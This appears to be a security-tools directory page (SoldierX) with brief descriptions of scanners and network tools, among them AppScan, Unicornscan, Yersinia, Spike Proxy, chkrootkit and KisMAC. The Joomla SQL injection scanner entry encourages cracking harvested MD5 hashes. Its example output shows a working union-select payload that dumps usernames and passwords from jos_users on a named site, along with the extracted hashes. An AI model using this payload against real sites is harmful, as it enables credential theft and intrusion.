SOLDIERX.COM Nobody Can Stop Information Insemination

Joomla Sql Injection Scanner is an exceedingly quick python based vulnerability scanner that can be utilized against Joomla servers. It is regularly updated by the author with the current exploitable holes (sql injection) that affect Joomla and is also extremely easy to use. Successful use of the tool will almost certainly provide you with a nice MD5 hash for the website to put into/ submit to your favourite MD5 cracker.

Installation:
Download the file
Python needs to be installed.

Execution:
Usage: ./joomsq.py

Example Output:
C:\Python25>joomsq.py www.mgn-games.org

Joomla Sql Injection Scanner v 1.0

beenudel1986[at]gmail[dot]com
[+] JoomlaPath: www.mgn-games.org
[+] Vuln. Loaded: 67
[+] Testing...

Host: http://www.mgn-games.org/index.php?option=com_pcchess&Itemid=61&page=playe
rs&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from
/**/jos_users/*
Found:
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55

[-] Done

Right Click Download Link> save file/link as

AppScan provides security testing throughout the application development lifecycle, easing unit testing and security assurance early in the development phase. Appscan scans for many common vulnerabilities, such as cross site scripting, HTTP response splitting, parameter tampering, hidden field manipulation, backdoors/debug options, buffer overflows and more. Appscan was merged into IBM's Rational division after IBM purchased it's original developer (Watchfire) in 2007.

IT auditors and compliance officers are looking for a process to test Web application security controls so that their Web applications are not exposed to vulnerabilities that can be exploited by hackers. AppScan® Standard Edition helps customers by integrating vulnerability testing into the Web application development process for new or existing applications. AppScan provides mechanisms to periodically test against known vulnerabilities.

IBM Rational AppScan Standard Edition is an industry-leading Web application security testing tool that scans and tests for all common web application vulnerabilities - including those identified in the WASC threat classification - such as SQL-Injection, Cross-Site Scripting and Buffer Overflow.

*Provides broad application coverage, including Web 2.0/Ajax applications

*Generates advanced remediation capabilities including a comprehensive task list to ease vulnerability remediation

*Simplifies security testing for non-security professionals by building scanning intelligence directly into the application

*Features over 40 out-of-the-box compliance reports including PCI Data Security Standards, ISO 17799, ISO 27001, Basel II, SB 1386 and PABP (Payment Application Best Practices)

New and updated features in V7.8 provide sophisticated security that simplify testing of complex Web environments.

Highlights of IBM Rational AppScan Standard Edition V7.8 Include:

Safety Lab Shadow Security Scanner is a Proactive Computer Network Security Vulnerability Assessment Scanner with over 5000 audits.

tcptraceroute is a traceroute implementation using TCP packets.
The more traditional traceroute( sends out either UDP or ICMP ECHO packets with a TTL of one, and increments the TTL until the destination has been reached. By printing the gateways that generate ICMP time exceeded messages along the way, it is able to determine the path packets are taking to reach the destination.
The problem is that with the widespread use of firewalls on the modern Internet, many of the packets that traceroute( sends out end up being filtered, making it impossible to completely trace the path to the destination. However, in many cases, these firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections on. By sending out TCP SYN packets instead of UDP or ICMP ECHO packets, tcptraceroute is able to bypass the most common firewall filters.

Web Server Assessment Tool
Wikto is a tool that checks for flaws in webservers. It provides much the same functionality as Nikto but adds various interesting pieces of functionality, such as a Back-End miner and close Google integration. Wikto is written for the MS .NET environment and registration is required to download the binary and/or source code.

Unicornscan is an attempt at a User-land Distributed TCP/IP stack. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Although it currently has hundreds of individual features, a main set of abilities include:
* Asynchronous stateless TCP scanning with all variations of TCP Flags.
* Asynchronous stateless TCP banner grabbing
* Asynchronous protocol specific UDP Scanning (sending enough of a signature to elicit a response).
* Active and Passive remote OS, application, and component identification by analyzing responses.
* PCAP file logging and filtering
* Relational database output
* Custom module support
* Customized data-set views

Yersinia is a network tool designed to take advantage of some weaknesses in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems.

HTTP Hacking
Spike Proxy is an open source HTTP proxy for finding security flaws in web sites. It is part of the Spike Application Testing Suite and supports automated SQL injection detection, web site crawling, login form brute forcing, overflow detection, and directory traversal detection.

Locally checks for signs of a rootkit.
chkrootkit is a flexible, portable tool that can check for many signs of rootkit intrusion on Unix-based systems. Its features include detecting binary modification, utmp/wtmp/lastlog modifications, promiscuous interfaces, and malicious kernel modules.

KisMAC is an open-source and free sniffer/scanner application for Mac OS X. It has an advantage over MacStumbler / iStumbler / NetStumbler in that it uses monitor mode and passive scanning.
KisMAC supports several third party PCMCIA cards: Orinoco, PrismII, Cisco Aironet, Atheros and PrismGT. USB devices with Intersil Prism2, Ralink rt2570 and rt73, and Realtek rtl8187 chipsets are in progress towards full support as well. All of the internal AirPort hardware is supported for scanning.